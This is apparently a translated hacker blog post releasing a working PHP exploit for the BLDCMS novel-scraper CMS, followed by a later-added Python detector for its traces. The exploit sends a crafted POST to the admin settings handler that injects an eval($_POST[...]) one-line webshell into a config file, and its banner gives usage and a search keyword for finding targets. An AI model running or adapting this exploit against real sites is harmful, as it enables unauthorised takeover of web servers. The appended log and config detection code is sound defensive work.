A while back I was going after a hacker's site and noticed that one of the sites sharing its server ran BLDCMS, so I downloaded it and had a look... and found a getshell vulnerability.
As it happens, last night 晴天小铸 found that someone on 90sec had already posted an analysis of this getshell vulnerability. Damn, someone beat me to it.
Since it's already out there, I'll just release the EXP I wrote earlier.
```php
<?php
echo "-------------------------------------------------------------------------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP (GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n 2013.3.21\r\n 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n--------------------------------------------------------------------\r\n";
$url  = $argv[1];
$dir  = $argv[2];
$pass = $argv[3];
// Value that closes the config file's quoted string and appends an eval();
// only works when magic_quotes_gpc is off, as the banner says (GPC=Off)
$eval = '\';eval($_POST['.'"'.$pass.'"'.']);\'';
if (empty($pass) || empty($url)) {
    exit("请输入参数");
} else {
    // Form fields of the admin settings handler; sqlite carries the payload
    $fuckdata = 'sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$eval;
    $length   = strlen($fuckdata);
    function getshell($url, $pass)
    {
        global $url, $dir, $pass, $eval, $length, $fuckdata;
        // Raw HTTP request sent over a plain socket
        $header  = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "User-Agent: MSIE\r\n";
        $header .= "Host:".$url."\r\n";
        $header .= "Content-Length: ".$length."\r\n";
        $header .= "Connection: Close\r\n";
        $header .= "\r\n";
        $header .= $fuckdata."\r\n\r\n";
        $fp = fsockopen($url, 80, $errno, $errstr, 15);
        if (!$fp) {
            exit("利用失败:请检查指定目标是否能正常打开");
        } else {
            if (!fputs($fp, $header)) {
                exit("利用失败");
            } else {
                // Read the response to completion, then report where the shell was written
                $receive = '';
                while (!feof($fp)) {
                    $receive .= @fgets($fp, 1000);
                }
                @fclose($fp);
                echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标GPC是否=off)";
            }
        }
    }
    getshell($url, $pass);
}
?>
```
by 数据流
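The request path, the action parameter and the planted file name above give a defender something concrete to look for. As an added example (not from the original post or from BLDCMS itself), this Python snippet flags the config-writing POST and any later POSTs to the planted file in web-server access logs, and checks a PHP config file for a value that breaks out of its string into eval(); the log lines and config text are constructed samples.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlparse

# Common log format: client - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A quoted PHP value that closes its string and evals request data, the shape
# the exploit writes into conn/config/normal2.php when magic_quotes_gpc is off.
INJECTED_EVAL = re.compile(r"""['"]\s*;\s*@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[""")

def classify_request(method: str, target: str) -> str:
    """'exploit' for the config-writing POST, 'webshell' for a POST to the
    planted file, '' for anything else."""
    if method != "POST":
        return ""
    parsed = urlparse(target)
    if parsed.path.endswith("/admin/chuli.php") and parse_qs(parsed.query).get("action") == ["a_1"]:
        return "exploit"
    if parsed.path.endswith("/conn/config/normal2.php"):
        return "webshell"
    return ""

def triage_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, label) for every log line that matches either signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            label = classify_request(m.group("method"), m.group("target"))
            if label:
                hits.append((m.group("ip"), label))
    return hits

def find_injected_eval(php_source: str) -> List[int]:
    """1-based line numbers in a PHP config file where a value breaks out of its string into eval()."""
    return [n for n, line in enumerate(php_source.splitlines(), 1) if INJECTED_EVAL.search(line)]

# Constructed sample data (documentation-range IPs, not a real server).
SAMPLE_LOG = [
    '203.0.113.9 - - [21/Mar/2013:22:10:01 +0800] "POST /cms/admin/chuli.php?action=a_1 HTTP/1.1" 200 512',
    '198.51.100.4 - - [21/Mar/2013:22:10:05 +0800] "GET /cms/index.php HTTP/1.1" 200 2048',
    '203.0.113.9 - - [21/Mar/2013:22:10:09 +0800] "POST /cms/conn/config/normal2.php HTTP/1.1" 200 77',
    '192.0.2.7 - - [21/Mar/2013:22:11:00 +0800] "GET /cms/admin/chuli.php?action=a_1 HTTP/1.1" 200 300',
]
SAMPLE_CONFIG = "<?php\n$sitename='a';\n$sqlite='';eval($_POST[\"pass\"]);'';\n"
```

A single client doing the action=a_1 POST and then POSTing to conn/config/normal2.php minutes later is the sequence worth alerting on; a clean install never POSTs to that config file.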